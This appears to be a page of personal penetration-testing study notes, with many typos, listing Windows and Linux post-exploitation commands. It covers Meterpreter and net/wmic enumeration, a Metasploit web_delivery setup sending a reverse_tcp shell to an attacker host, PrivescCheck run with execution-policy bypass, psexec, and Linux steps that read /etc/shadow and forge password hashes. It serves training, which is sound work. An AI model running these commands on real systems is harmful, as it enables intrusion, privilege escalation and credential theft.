You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
local enumration - user nad groups,system inforamtion
transgering files - web server to download files
upgrading shell tty shell
priv escaltion, winpeas lin peas,
persistence
dumping crakc hashes
pivoting , internal network recon pivoting
clearing your trakcs on widnwos linxu
Enumrating SYstem inforamtion
Learn operating system verison
look host name os name os build os arhcitecure install update/hotfixes
meterpreter > getuid #username
meterpreter > sysinfo
hostname
systeminfo # all OS info
wmix qfe get Caption,Description,HotFixID, InstalledOn
cat eula.txt # information of OS info
Enumarting User and Groups
meterpreter > getprivs
enum_logged_on_users
whoami
whoami /priv
query user # currently logged on user
net users # list all the user accounts
net user administrator
net localgroup
net localgroup administrators
enumerating network information
ipconfig
ipconfig /all
route print
arp -a # routing table
netstat -ano # services
netsh firewall show state
netsh advfirewall firewall show all profiles
Enumerating Process and Services
proceess is an instance of an exe
services that run on the background
meterpreter > ps
meterpreter > explorer.exe
meterpreter > migrate PID_NUM
net start #services
wmic service list brief # services running in the background
tasklist /SVC # services running with process
schtasks /query /fo LIST # list all scheduele task
schtask /query /fo / LIST -v
Automating Windows Local Enumeration
we can use view script and tools
JAWS is Powershell script to help penetration tester quickly idenfitifed
In order to elevaste your privileges on Windowso you have to difentify the privilege escaltion The process will diffret greatly based on the types of target you gain access to
PrivescCheck for Windows
msfconsole > web_delivery
set target PSH
set target PSH\ (Binary)
set payload windows/shell/reverse_tcp
set PSH-EcondedCommand False
set LHOST KALIIP
shell_to_meterpreter
set LHOST eth1
show advanced
set WIN_TRANSFER VBS
Privescheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,CSV,HTML,XML"
Widnows Privlege Escelation
psexec.py username@IP
msconsole psexec
Linux Privlege Escalation Weak Permissions
Linenum
cat /etc/passwd
cat /etc/groups
groups
find / -not -type l -perm -o+w
ls -al /etc/shadow
openssl passwd -1 -salt abc password
remove * from etc shadow